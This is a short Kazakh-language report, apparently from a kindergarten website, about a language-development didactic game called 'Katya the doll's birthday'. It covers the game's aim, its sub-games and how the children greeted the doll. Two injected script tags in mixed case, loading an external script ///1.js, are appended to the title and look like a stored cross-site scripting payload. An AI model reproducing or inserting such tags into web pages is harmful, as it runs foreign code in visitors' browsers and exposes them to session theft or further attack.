Дидактикалық ойын «Катя қуыршағының туған күні»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.02.2023
Мектепке дейінгі білім беру онкүндігі аясында «Бөбектер» ортаңғы тобында «Катя қуыршағының туған күні» тіл дамыту бойынша дидактикалық ойын өткізілді.
Ойынның мақсаты: дидактикалық ойын барысында балалардың үйлесімді сөйлеуін қалыптастыру.
Дидактикалық ойын барысында балалар сұрақтар бойынша ойыншықтарға сипаттама берді, заттардың қасиеттерін, іс-әрекетін білдіретін сөздерді қолданды. Сондай-ақ ойында «Дүкен», «Тағамдарды тәрелкеге сал», «Табақшаларға кесе тер», «Сөздерді айт» қосымша ойындары қолданылды. Балалар қуыршақ Катяны туған күнімен құттықтап, сыйлықтар беріп құттықтады.